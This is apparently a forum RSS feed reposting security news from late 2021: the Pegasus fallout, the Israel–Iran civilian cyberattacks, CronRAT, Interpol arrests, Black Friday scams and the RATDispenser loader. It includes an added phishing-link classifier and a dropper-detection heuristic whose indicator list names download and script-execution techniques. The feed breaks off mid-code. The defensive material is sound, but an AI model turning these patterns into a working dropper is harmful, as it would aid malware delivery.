</p>

<p>
	 
</p>

<p>
	Those allegations have been levied against the companies—particularly NSO Group—for years. But they came to a head in July when a consortium of organizations led by Forbidden Stories and Amnesty International published a series of reports on the company's Pegasus spyware.
</p>

<p>
	 
</p>

<p>
	The resulting scrutiny wasn't exclusive to the Commerce Department. Apple recently sued NSO Group in hopes of banning it from using its products again. It's also seeking damages, which it says will be donated "to organizations pursuing cybersurveillance research and advocacy."
</p>

<p>
	 
</p>

<p>
	Israel hasn't said why it issued these restrictions on cyberweapons exports, but between the US government's sanctions and a lawsuit filed by one of the world's richest companies, it's not hard to guess why the country suddenly decided to bring its security industry to heel.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/israel-restricts-hacking-tool-spyware-exports-amid-controversy" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3509</guid><pubDate>Mon, 29 Nov 2021 14:24:03 +0000</pubDate></item><item><title>Israel and Iran Broaden Cyberwar to Attack Civilian Targets</title><link>https://nsaneforums.com/news/security-privacy-news/israel-and-iran-broaden-cyberwar-to-attack-civilian-targets-r3499/</link><description><![CDATA[<p>
	Millions of ordinary people in Iran and Israel recently found themselves caught in the crossfire of a cyberwar between their countries. In Tehran, a dentist drove around for hours in search of gasoline, waiting in long lines at four gas stations only to come away empty.
</p>

<p>
	 
</p>

<p>
	In Tel Aviv, a well-known broadcaster panicked as the intimate details of his sex life, and those of hundreds of thousands of others stolen from an L.G.B.T.Q. dating site, were uploaded on social media.
</p>

<p>
	 
</p>

<p>
	For years, Israel and Iran have engaged in a covert war, by land, sea, air and computer, but the targets have usually been military or government related. Now, the cyberwar has widened to target civilians on a large scale.
</p>

<p>
	 
</p>

<p>
	In recent weeks, a cyberattack on Iran’s nationwide fuel distribution system paralyzed the country’s 4,300 gas stations, and it took 12 days for service to be fully restored.
</p>

<p>
	 
</p>

<p>
	That attack was attributed to Israel by two U.S. defense officials, who spoke on the condition of anonymity to discuss confidential intelligence assessments. It was followed days later by cyberattacks in Israel against a major medical facility and a popular L.G.B.T.Q. dating site, attacks Israeli officials have attributed to Iran.
</p>

<p>
	 
</p>

<p>
	The escalation comes as American authorities have warned of Iranian attempts to hack the computer networks of hospitals and other critical infrastructure in the United States. As hopes fade for a diplomatic resurrection of the Iranian nuclear agreement, such attacks are only likely to proliferate.
</p>

<p>
	 
</p>

<p>
	Hacks have been seeping into civilian arenas for months. Iran’s national railroad was attacked in July, but that relatively unsophisticated hack may not have been Israeli. And Iran is accused of making a failed attack on Israel’s water system last year.
</p>

<p>
	 
</p>

<p>
	The latest attacks are thought to be the first to do widespread harm to large numbers of civilians. Nondefense computer networks are generally less secure than those tied to state security assets.
</p>

<p>
	 
</p>

<p>
	No one died in these attacks, but if their goal was to create chaos, anger, and emotional distress on a large scale, they succeeded wildly.
</p>

<p>
	 
</p>

<p>
	“Perhaps there’s a war going on between Israel and Iran, but from the little civilian’s perspective we are being held as prisoners here in the middle and are helpless,” said Beni Kvodi, 52, an editor at an Israeli radio station.
</p>

<p>
	 
</p>

<p>
	Mr. Kvodi has been openly gay for years, but the hack on the Israeli dating site threatened to expose thousands of Israelis who had not come out publicly about their sexual orientation. The site collected embarrassing information about users’ sexual habits, as well as explicit photos.
</p>

<p>
	 
</p>

<p>
	Ali, a 39-year-old driver with the national taxi company in Tehran who, like other Iranians interviewed, asked that his last name not be used out of fear for his security, said he lost a day of work waiting in gas station lines that snaked for miles.
</p>

<p>
	 
</p>

<p>
	“Every day you wake up in this country and you have a new problem,” he said in a telephone interview. “It isn’t our fault our governments are enemies. It’s already hard enough for us to survive.”
</p>

<p>
	 
</p>

<p>
	Both countries appear to be striking out at civilians to send messages to their governments.
</p>

<p>
	 
</p>

<p>
	The hack on Iran’s fuel distribution system took place on Oct. 26, near the two-year anniversary of large antigovernment protests set off by a sudden increase in gasoline prices. The government responded then with a brutal crackdown, which Amnesty International said killed more than 300 people.
</p>

<p>
	 
</p>

<p>
	The cyberattack appeared aimed at generating another wave of antigovernment unrest.
</p>

<p>
	 
</p>

<p>
	Gas pumps suddenly stopped working and a digital message directed customers to complain to Iran’s supreme leader, Ayatollah Ali Khamenei, displaying the phone number of his office.
</p>

<p>
	 
</p>

<p>
	The hackers took control of billboards in cities like Tehran and Isfahan, replacing ads with the message “Khamenei, where is my gasoline?”
</p>

<p>
	 
</p>

<p>
	“At 11 a.m. suddenly the pumps stopped working,” said Mohsen, the manager of a gas station in northern Tehran. “I have never seen anything like this.”
</p>

<p>
	 
</p>

<p>
	Rumors spread that the government had engineered the crisis to raise fuel prices. Iran’s app-based taxi companies, Snap and Tapsi, doubled and tripled their normal fares in response to drivers having to purchase expensive unsubsidized fuel, Iranian news media reported.
</p>

<p>
	 
</p>

<p>
	The antigovernment uprising never materialized but the government scrambled to contain the damage and tamp down the uproar. The Oil Ministry and the National Cyber Council held emergency meetings. The oil minister, Javad Owji, issued a rare public apology on state television, and pledged an extra 10 liters of subsidized fuel to all car owners.
</p>

<p>
	 
</p>

<p>
	To get pumps back online, the ministry had to send technicians to every gas station in the country. Once the pumps were reset, most stations could still sell only unsubsidized fuel, which is twice the price of subsidized fuel.
</p>

<p>
	 
</p>

<p>
	It took nearly two weeks to restore the subsidy network, which allots each vehicle 60 liters — about 16 gallons — a month at half price.
</p>

<p>
	But the hack may have been more serious than an inconvenience to motorists.
</p>

<p>
	 
</p>

<p>
	A senior manager in the Oil Ministry and an oil dealer with knowledge of the investigation, who spoke on the condition of anonymity to avoid repercussions, said that officials were alarmed that hackers had also gained control of the ministry’s fuel storage tanks and may have had access to data on international oil sales, a state secret that could expose how Iran evades international sanctions.
</p>

<p>
	 
</p>

<p>
	Because the ministry’s computer servers contain such sensitive data, the system operates unconnected to the internet, leading to suspicions among Iranian officials that Israel may have had inside help.
</p>

<p>
	 
</p>

<p>
	Four days after Iran’s pumps stopped working, hackers gained access to the databank of the Israeli dating site Atraf, and medical files at Machon Mor Medical Institute, a network of private clinics in Israel.
</p>

<p>
	 
</p>

<p>
	Files from both hacks — including the personal information of about 1.5 million Israelis, about 16 percent of the country’s population — were posted to a channel on the Telegram messaging app.
</p>

<p>
	 
</p>

<p>
	The Israeli government asked Telegram to block the channel, which it did. But the hackers, a little-known group called Black Shadow, immediately reposted the material on a new channel, and continued to do so each time it was blocked.
</p>

<p>
	 
</p>

<p>
	The group also posted files stolen from the Israeli insurance company Shirbit, which was hacked last December and insured employees of Israel’s Defense Ministry.
</p>

<p>
	 
</p>

<p>
	Three senior Israeli officials, who asked not to be identified in order to discuss secret cyber issues, said that Black Shadow was either part of the Iranian government or freelance hackers working for the government.
</p>

<p>
	 
</p>

<p>
	Personal data from the dating site could be disastrous “even for those who are already out of the closet,” Mr. Kvodi said. “Each one of us has a very close and intimate ‘relationship’ with Atraf.”
</p>

<p>
	 
</p>

<p>
	The site contains not only names and addresses, he said, but also “our sexual preferences, who’s H.I.V. positive, who uses prophylactics or does not, along with the fact that the site makes it possible to upload nude photographs and relevant video footage of us and to send them to other subscribers.”
</p>

<p>
	 
</p>

<p>
	Many Atraf subscribers soon complained that their Instagram, Facebook or Gmail accounts had also been hacked.
</p>

<p>
	 
</p>

<p>
	Cyber experts said these hacks were not the work of Black Shadow but knock-on hacks by criminals who used the personal data Black Shadow had posted. In some cases, they blocked the accounts, demanding ransom to restore access.
</p>

<p>
	 
</p>

<p>
	Neither Israel nor Iran has publicly claimed responsibility or laid blame for the latest round of cyberattacks. Israeli officials refused to publicly accuse Iran, and Iranian officials have blamed the gas station attack on a foreign country, stopping short of naming one.
</p>

<p>
	 
</p>

<p>
	Experts say the cyberattacks on softer civilian targets could be the start of a new phase in the conflict.
</p>

<p>
	 
</p>

<p>
	Lotem Finkelstein, head of intelligence at Check Point, a cybersecurity company, said that Iranian hackers had “identified a failure in Israeli understanding” about cyber conflict.
</p>

<p>
	 
</p>

<p>
	They realized that “they do not need to attack a government agency, which is much more protected,” but could easily attack small, private companies, with less sophisticated security, “that control enormous amounts of information, including financial or intimate personal information about many citizens.”
</p>

<p>
	 
</p>

<p>
	Each side blames the other for the escalation, and even if there were the will to stop it, it’s hard to see how this genie gets recorked.
</p>

<p>
	 
</p>

<p>
	“We are in a dangerous phase,” Maysam Behravesh, a former chief analyst for Iran’s Intelligence Ministry, said in a Clubhouse chat on Monday. “There will be a next round of widespread cyberattack on our infrastructure. We are a step closer to military confrontation.”
</p>

<p>
	 
</p>

<p>
	The post <span style="color:#2980b9;">Israel and Iran Broaden Cyberwar to Attack Civilian Targets </span>appeared first on <span style="color:#2980b9;"><a href="https://www.nytimes.com/" rel="external nofollow">New York Times</a></span>.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://dnyuz.com/2021/11/27/israel-and-iran-broaden-cyberwar-to-attack-civilian-targets/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3499</guid><pubDate>Sat, 27 Nov 2021 16:23:00 +0000</pubDate></item><item><title>CronRAT: A New Linux Malware That's Scheduled to Run on February 31st</title><link>https://nsaneforums.com/news/security-privacy-news/cronrat-a-new-linux-malware-thats-scheduled-to-run-on-february-31st-r3497/</link><description><![CDATA[<p>
	Researchers have unearthed a new remote access trojan (RAT) for Linux that employs a never-before-seen stealth technique that involves masking its malicious actions by scheduling them for execution on February 31st, a non-existent calendar day.
</p>

<p>
	 
</p>

<p>
	Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet.
</p>

<p>
	 
</p>

<p>
	CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk.
</p>

<p>
	 
</p>

<p>
	"The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st."
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEiRUSrPMWQv-kX41uk_8Q0kwMruYcJmBt-5" class="ipsImage" data-ratio="37.50" height="267" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEiRUSrPMWQv-kX41uk_8Q0kwMruYcJmBt-5nRQOObcEvdLC9bLY_VBpOxwcfqoEvfmkE0tcwgxVO7uw5Kh9d5yJ64F5OJHcF5_r4oxs00D85JuB3E6VOGenzsTqZIDhz_rZZJUnXbwgKk6eeAZPzU4U0NKUU5ht6lAY8HBZsDOoLojEIcNJs9wmRd-F" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The RAT — a "sophisticated Bash program" — also uses many levels of obfuscation to make analysis difficult, such as placing code behind encoding and compression barriers, and implementing a custom binary protocol with random checksums to slip past firewalls and packet inspectors, before establishing communications with a remote control server to await further instructions.
</p>

<p>
	 
</p>

<p>
	Armed with this backdoor access, the attackers associated with CronRAT can run any code on the compromised system, the researchers noted.
</p>

<p>
	 
</p>

<p>
	"Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/11/cronrat-new-linux-malware-thats.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3497</guid><pubDate>Sat, 27 Nov 2021 14:37:44 +0000</pubDate></item><item><title>Interpol arrests over 1,000 suspects linked to cyber crime</title><link>https://nsaneforums.com/news/security-privacy-news/interpol-arrests-over-1000-suspects-linked-to-cyber-crime-r3491/</link><description><![CDATA[<p>
	Interpol has coordinated the arrest of 1,003 individuals linked to various cyber-crimes such as romance scams, investment frauds, online money laundering, and illegal online gambling.
</p>

<p>
	 
</p>

<p>
	This crackdown results from a four-month action codenamed ‘Operation HAECHI-II,’ which took place in twenty countries between June and September 2021.
</p>

<p>
	 
</p>

<p>
	These were Angola, Brunei, Cambodia, Colombia, China, India, Indonesia, Ireland, Japan, Korea (Rep. of), Laos, Malaysia, Maldives, Philippines, Romania, Singapore, Slovenia, Spain, Thailand, and Vietnam.
</p>

<p>
	 
</p>

<p>
	On the financial side of the operation, the authorities have also intercepted nearly $27,000,000 and frozen 2,350 bank accounts linked to various online crimes.
</p>

<p>
	 
</p>

<p>
	As the Interpol announcement details, at least ten new criminal modus operandi were identified in HAECHI-II, indicative of the evolving nature of cyber-crime.
</p>

<h2>
	International fraud
</h2>

<p>
	One notable example of fraud unearthed in HAECHI-II involves a Colombian textiles company tricked by BEC (Business Email Compromise) actors.
</p>

<p>
	 
</p>

<p>
	The perpetrators impersonated a legal representative of the company and asked for $16 million in two payments of $8,000,000 to be sent to two Chinese bank accounts.
</p>

<p>
	 
</p>

<p>
	Interpol’s intervention helped retrieve 94% of this amount, saving the firm from bankruptcy.
</p>

<p>
	 
</p>

<p>
	In another case, a Slovenian firm was deceived into transferring $800,000 to money mule accounts in China. Interpol worked with the authorities in Beijing and helped return the full amount to the victim.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="police_raid.jpg" class="ipsImage" data-ratio="75.10" height="475" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/police/police_raid.jpg">
		</p>

		<figcaption>
			Police raid in the home of a cybercriminal<br>
			Source: Interpol
		</figcaption>
	</figure>
</div>

<p>
	A rising trend the investigators noticed during HAECHI-II was the use of ‘Squid Game’ as a theme for malware distribution campaigns.
</p>

<p>
	 
</p>

<p>
	The actors took advantage of the popularity of the Netflix show to distribute trojanized apps masquerading as mobile games.
</p>

<p>
	 
</p>

<p>
	In reality, these apps automatically subscribed users to ‘premium’ services and inflated their bills, while their distributors cashed in through affiliate schemes.
</p>

<p>
	 
</p>

<p>
	“Online scams like those leveraging malicious apps evolve as quickly as the cultural trends they opportunistically exploit,” <a href="https://www.interpol.int/News-and-Events/News/2021/More-than-1-000-arrests-and-USD-27-million-intercepted-in-massive-financial-crime-crackdown" rel="external nofollow" target="_blank">said José De Gracia</a>, Assistant Director, Criminal Networks at Interpol.
</p>

<p>
	 
</p>

<p>
	“Sharing information on emerging threats is vital to the ability of police to protect the victims of online financial crime. It also lets police know that no country is alone in this fight. Operation HAECHI-II shows that we can successfully strike back against this threat when we act together.”
</p>

<h2>
	HAECHI-I
</h2>

<p>
	Interpol’s previous large-scale online fraud crackdown operation was <a href="https://www.bleepingcomputer.com/news/security/interpol-intercepts-83-million-fighting-financial-cyber-crime/" target="_blank" rel="external nofollow">HAECHI-I</a>, spanning September 2020 to March 2021.
</p>

<p>
	 
</p>

<p>
	That operation involved 40 law enforcement officers and focused predominantly on the Asia Pacific region, resulting in 500 arrests.
</p>

<p>
	 
</p>

<p>
	The amount of money intercepted was $83,000,000, while the authorities also identified and froze 1,600 bank accounts belonging to fraudsters.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/legal/interpol-arrests-over-1-000-suspects-linked-to-cyber-crime/" rel="external nofollow">Interpol arrests over 1,000 suspects linked to cyber crime</a>
</p>
]]></description><guid isPermaLink="false">3491</guid><pubDate>Fri, 26 Nov 2021 23:06:38 +0000</pubDate></item><item><title>How cybercriminals adjusted their scams for Black Friday 2021</title><link>https://nsaneforums.com/news/security-privacy-news/how-cybercriminals-adjusted-their-scams-for-black-friday-2021-r3489/</link><description><![CDATA[<div>
	<p>
		Black Friday is approaching, and cybercriminals are honing their malware droppers, phishing lures, and fake sites while shoppers prepare to open their wallets.
	</p>

	<p>
		 
	</p>

	<p>
		As researchers at Kaspersky point out, scammers are already targeting people with fake tickets for the FIFA World Cup 2022.
	</p>

	<p>
		 
	</p>

	<p>
		The security firm shared <a href="http://securelist.com/black-friday-2021/104915/" rel="external nofollow" target="_blank">a detailed report</a> highlighting the most common threats expected to surface during this year's Black Friday, as well as the Christmas shopping season.
	</p>

	<h2>
		Phishing for data and e-payment accounts
	</h2>

	<p>
		Kaspersky's products alone detected over 40 million phishing attacks from January to October 2021, with Amazon, eBay, Alibaba, and Mercado Libre being the most popular lures.
	</p>

	<p>
		 
	</p>

	<p>
		As such, if you receive emails concerning promotions and discounts on large e-commerce platforms, you should treat them with extra caution.
	</p>

	<p>
		 
	</p>

	<p>
		In terms of trends, phishing actors doubled their effort to steal account credentials for e-payment systems (also known as online payment systems), with October 2021 seeing a rise of 208% compared to the month before.
	</p>

	<p>
		 
	</p>

	<p>
		While banking credentials are still targeted, phishing actors tend to favor e-payment systems more now, as those have risen in popularity by 40% during the last two years.
	</p>

	<div>
		<figure>
			<p>
				 
			</p>

			<p>
				<img alt="phishing.jpg" class="ipsImage" data-ratio="65.28" height="455" width="697" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/phishing.jpg">
			</p>

			<figcaption>
				Phishing targets in 2021<br>
				Source: Kaspersky
			</figcaption>
		</figure>
	</div>

	<h2>
		Banking trojans fading
	</h2>

	<p>
		Kaspersky has found that cybercriminals used 11 distinct malware families against shoppers in 2021, with more than half of them being variants of <a href="https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/" target="_blank" rel="external nofollow">Zeus banking trojan</a>.
	</p>

	<p>
		 
	</p>

	<p>
		The list of other popular strains used in 2021 malware attacks also includes Qbot (deployed in 13.9% of the total number of incidents), Anubis (13.4%), Trickbot (11.6%), and Neurevt (4.8%).
	</p>

	<p>
		 
	</p>

	<p>
		An interesting trend emerging from Kaspersky's stats is the number of infections, which has dropped from 20 million in the past two years to just 10 million this year.
	</p>

	<p>
		 
	</p>

	<p>
		This decline is in line with the shift of the threat actors' attention to electronic payments. Most of these trojan families have a narrow targeting scope limited to specific financial institutions or platforms, so reaching a wider range of potential victims takes considerably more effort.
	</p>

	<p>
		 
	</p>

	<p>
		Malware deployed now is more specialized for e-commerce platforms, looking to steal e-shop account credentials, bank card numbers, CVVs, expiration dates, and phone numbers.
	</p>

	<div>
		<figure>
			<p>
				 
			</p>

			<p>
				<img alt="malware.jpg" class="ipsImage" data-ratio="61.55" height="429" width="697" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/malware.jpg">
			</p>

			<figcaption>
				Volume of malware drops<br>
				Source: Kaspersky
			</figcaption>
		</figure>
	</div>

	<h2>
		Ending up on malicious sites
	</h2>

	<p>
		There are two categories of fake sites that can lead to problems for victims. The first one is phishing sites that steal credentials and the second one is scam sites that steal money.
	</p>

	<p>
		 
	</p>

	<p>
		In the first case, the lures typically come in the form of emails allegedly sent by high-profile online shops or popular e-commerce platforms, directing recipients to a fake login page.
	</p>

	<div>
		<figure>
			<p>
				 
			</p>

			<p>
				<img alt="phishing%20webpage.png" class="ipsImage" data-ratio="45.51" height="243" width="534" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/phishing%20webpage.png">
			</p>

			<figcaption>
				Fake German eBay site<br>
				Source: Kaspersky
			</figcaption>
		</figure>
	</div>
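<p>
	The check below is an added example, not Kaspersky's or BleepingComputer's code: it classifies the hostname of a link the way a mail filter or a careful reader would, flagging a brand name hidden in a subdomain, a lookalike spelling such as paypa1 or arnazon, a brand embedded in a longer domain, and punycode labels that need a human look. The allowlist of legitimate shop domains and the small set of two-label public suffixes are assumptions for the example; a real deployment would use the Public Suffix List and its own allowlist.
</p>

```javascript
// Added example: classify link hostnames that imitate shop or payment brands.
// The allowlist and the two-label suffix set are assumptions for this demo;
// a real deployment would use the Public Suffix List and its own allowlist.
const ALLOWLIST = ['ebay.com', 'ebay.de', 'amazon.com', 'paypal.com',
                   'alibaba.com', 'mercadolibre.com'];
const TWO_LABEL_SUFFIXES = new Set(['co.uk', 'com.br', 'com.mx', 'com.au', 'co.jp']);

// Registrable domain: the last two labels, or three when the last two form a
// known two-label public suffix (simplified stand-in for the Public Suffix List).
function registrableDomain(host) {
  const labels = host.split('.');
  if (labels.length >= 3 && TWO_LABEL_SUFFIXES.has(labels.slice(-2).join('.'))) {
    return labels.slice(-3).join('.');
  }
  return labels.slice(-2).join('.');
}

// Collapse characters and digraphs that look alike in common fonts, so that
// "paypa1" and "arnazon" compare equal to "paypal" and "amazon".
function skeleton(s) {
  return s.replace(/rn/g, 'm').replace(/vv/g, 'w').replace(/cl/g, 'd')
          .replace(/0/g, 'o').replace(/1/g, 'l').replace(/3/g, 'e').replace(/5/g, 's')
          .replace(/[^a-z]/g, '');
}

// Edit distance (single-row dynamic programming).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

function classifyHostname(hostname, allowlist = ALLOWLIST) {
  const host = hostname.toLowerCase().replace(/\.$/, '');
  const labels = host.split('.');
  // Internationalised labels arrive punycoded; homoglyph domains hide here,
  // so hand them to a human rather than guessing.
  if (labels.some((l) => l.startsWith('xn--'))) return { verdict: 'punycode-label', matched: null };
  const reg = registrableDomain(host);
  if (allowlist.includes(reg)) return { verdict: 'allowlisted', matched: reg };
  const regSld = reg.split('.')[0];
  const subLabels = labels.slice(0, labels.length - reg.split('.').length);
  for (const legit of allowlist) {
    const brand = legit.split('.')[0];
    // ebay.de.account-verify.example: the brand is a subdomain of someone else's domain.
    if (subLabels.includes(brand)) return { verdict: 'brand-in-subdomain', matched: legit };
    // ebay.co.uk when only ebay.com / ebay.de are allowlisted: verify before trusting.
    if (regSld === brand) return { verdict: 'brand-on-other-tld', matched: legit };
    // paypal-secure-login.example
    if (regSld.includes(brand)) return { verdict: 'brand-embedded', matched: legit };
    // paypa1.com, arnazon.com, ebav.com
    if (levenshtein(skeleton(regSld), skeleton(brand)) <= 1) return { verdict: 'lookalike', matched: legit };
  }
  return { verdict: 'unknown', matched: null };
}

// Convenience wrapper for a full URL as found in an e-mail.
function classifyLink(url) {
  let hostname;
  try {
    hostname = new URL(url).hostname;
  } catch (e) {
    return { verdict: 'unparseable', matched: null };
  }
  return classifyHostname(hostname);
}

// Constructed sample links for the demo.
const SAMPLE_LINKS = [
  'https://signin.ebay.de/ws/eBayISAPI.dll',
  'https://ebay.de.account-verify.example/login',
  'https://www.paypa1.com/',
  'https://www.arnazon.com/',
  'https://paypal-secure-login.example/',
  'https://www.example.org/',
];
for (const link of SAMPLE_LINKS) console.log(classifyLink(link).verdict.padEnd(20), link);
```

<p>
	Only an exact match on the registrable domain counts as legitimate; everything else that mentions or resembles a brand is a flag for review, and an edit distance of one is deliberately generous for short brand names, so tune the threshold by brand length before using this in a filter.
</p>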

	<p>
		The second case involves sites that clone real shops by copying their stylesheets and all of their content, or simply fake marketplaces that take payments without ever shipping anything to the buyer.
	</p>

	<p>
		 
	</p>

	<p>
		In some cases, these platforms do send the victim an empty envelope, solely so they can provide a valid tracking number and delay the complaints that would let hosting providers or authorities take them down sooner.
	</p>

	<p>
		 
	</p>

	<p>
		A valid tracking number also reduces the chance that a PayPal payment dispute will hold the funds before they reach the scammers' accounts and let the victim recover the money.
	</p>

	<div>
		<figure>
			<p>
				 
			</p>

			<p>
				<img alt="fake_shop.png" class="ipsImage" data-ratio="66.19" height="413" width="624" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/fake_shop.png">
			</p>

			<figcaption>
				Cloned site offering goods that will never be shipped.<br>
				Source: Kaspersky
			</figcaption>
		</figure>
	</div>

	<h2>
		How to stay safe while shopping online
	</h2>

	<p>
		Remember, you will see many product discounts and sales promotions during the holidays. However, the chances of some of them being scams are higher than usual.
	</p>

	<p>
		 
	</p>

	<p>
		To protect yourself and your bank account, use an internet security solution from a trusted vendor and always double-check that you are on the legitimate site before entering your payment details.
	</p>

	<p>
		 
	</p>

	<p>
		If you stumble upon an offer that seems too good to be true, it's probably a scam even in the context of Black Friday.
	</p>

	<p>
		 
	</p>

	<p>
		Finally, paying through an e-payment service rather than entering your credit card details is preferable, because a data breach at the merchant then exposes less of your financial information.
	</p>

	<p>
		 
	</p>

	<p>
		There are also <a href="https://privacy.com/" rel="external nofollow" target="_blank">one-time virtual cards</a> with spending limits, so if you want to play it safe while shopping at lesser-known shops, there are ways to do it.
	</p>

	<p>
		 
	</p>

	<p>
		If you have to pay with your bank account or card, verify that the right amount has been charged and monitor all future transactions closely.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/how-cybercriminals-adjusted-their-scams-for-black-friday-2021/" rel="external nofollow">How cybercriminals adjusted their scams for Black Friday 2021</a>
</p>
]]></description><guid isPermaLink="false">3489</guid><pubDate>Thu, 25 Nov 2021 23:28:40 +0000</pubDate></item><item><title>AV-TEST confirms Windows Defender is amongst the very finest antiviruses you get in 2021</title><link>https://nsaneforums.com/news/security-privacy-news/av-test-confirms-windows-defender-is-amongst-the-very-finest-antiviruses-you-get-in-2021-r3486/</link><description><![CDATA[<p>
	AV-TEST, the IT Security research institute based in Germany, released its October 2021 best anti-virus programs assessment report for Windows 10 home users. In this report, the organization took a look at 21 different anti-malware programs from various companies and the test also included Microsoft's Windows Defender.
</p>

<p>
	 
</p>

<p>
	Very much to Microsoft's delight, surely, Windows Defender scored very highly in this assessment. In fact, it is among the very best products available today, scoring the full 18 points. It has therefore received the "AV-TEST TOP PRODUCT" certification, which requires a total of 17.5 points or more.
</p>

<p>
	 
</p>

<p>
	However, it is not alone at the top: other security programs, including Avira, Avast, AVG, Bitdefender, and ESET, also received this seal of approval. The remaining products scored below 17.5 points and received the "AV-TEST Certified" badge instead.
</p>

<p>
	 
</p>

<p>
	The full score of 18 points is made up of three categories worth a maximum of six points each:
</p>

<p>
	 
</p>

<ul>
	<li>
		Protection
	</li>
	<li>
		Performance
	</li>
	<li>
		Usability
	</li>
</ul>

<p>
	 
</p>

<p>
	The image below shows how each of the 21 tested anti-virus programs scored in the three categories, differentiated by shades of blue:
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="1637847729_avtest_win_10_scores_story.jp" class="ipsImage" data-ratio="75.10" height="540" width="703" src="https://cdn.neow.in/news/images/uploaded/2021/11/1637847729_avtest_win_10_scores_story.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	You can find the full test report for October 2021 <a href="https://www.av-test.org/en/antivirus/home-windows/" rel="external nofollow">here</a>.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/av-test-confirms-windows-defender-is-amongst-the-very-finest-antiviruses-you-get-in-2021/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3486</guid><pubDate>Thu, 25 Nov 2021 14:48:21 +0000</pubDate></item><item><title>This New Stealthy JavaScript Loader Infecting Computers with Malware</title><link>https://nsaneforums.com/news/security-privacy-news/this-new-stealthy-javascript-loader-infecting-computers-with-malware-r3485/</link><description><![CDATA[<p>
	Threat actors have been found using a previously undocumented JavaScript malware strain that functions as a loader to distribute an array of remote access Trojans (RATs) and information stealers.
</p>

<p>
	 
</p>

<p>
	HP Threat Research dubbed the new, evasive loader "RATDispenser," with the malware responsible for deploying at least eight different malware families in 2021. Around 155 samples of this new malware have been discovered, spread across three different variants, hinting that it's under active development.
</p>

<p>
	 
</p>

<p>
	"RATDispenser is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device," security researcher Patrick Schläpfer said. "All the payloads were RATs, designed to steal information and give attackers control over victim devices."
</p>

<p>
	 
</p>

<p>
	As with other attacks of this kind, the infection starts with a phishing email carrying a malicious attachment. The attachment masquerades as a text file but is in fact obfuscated JavaScript that writes and executes a VBScript file, which in turn downloads the final-stage malware payload onto the infected machine.
</p>
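<p>
	As an added example (not HP's detection logic and not RATDispenser's code), the heuristic below scores an e-mail attachment the way a mail-gateway rule would for the chain just described: a script extension hidden behind a document-looking name, Windows Script Host COM objects, a file write that produces a .vbs, and a process launch. The indicator list, weights and thresholds are assumptions chosen for the demo, and the dropper sample it runs against is constructed and inert (it exists only as a string here, and the VBScript it would write merely shows a message box).
</p>

```javascript
// Added example: heuristic triage of a script attachment for the
// JS -> VBScript dropper pattern. Indicator list, weights and thresholds are
// assumptions for the demo, not HP's or any vendor's detection content.
const SCRIPT_EXT = new Set(['js', 'jse', 'vbs', 'vbe', 'wsf', 'wsh', 'hta']);
const DECOY_EXT = new Set(['txt', 'pdf', 'doc', 'docx', 'xls', 'xlsx', 'jpg', 'png', 'zip']);

// Source-level indicators. "spawns-process" is deliberately case-sensitive:
// WSH callers write .Run( / .Exec( with capitals, while RegExp.prototype.exec
// in ordinary JavaScript is lower-case and must not trip the rule.
const INDICATORS = [
  { name: 'activex-object',    weight: 3, re: /new\s+ActiveXObject\s*\(/i },
  { name: 'wscript-shell',     weight: 3, re: /WScript\.Shell/i },
  { name: 'filesystem-object', weight: 2, re: /Scripting\.FileSystemObject/i },
  { name: 'writes-vbs',        weight: 3, re: /\.vbs\b|CreateTextFile\s*\(/i },
  { name: 'spawns-process',    weight: 3, re: /\.(Run|Exec)\s*\(|[cw]script\.exe/ },
  { name: 'downloader',        weight: 2, re: /MSXML2\.XMLHTTP|ADODB\.Stream|WinHttpRequest/i },
  { name: 'dynamic-eval',      weight: 2, re: /\beval\s*\(|\bunescape\s*\(|new\s+Function\s*\(/ },
  { name: 'charcode-building', weight: 2, re: /String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}/ },
  { name: 'hex-escapes',       weight: 1, re: /(?:\\x[0-9a-fA-F]{2}){16,}/ },
];

// Filename indicators: a script extension at all, a decoy document extension
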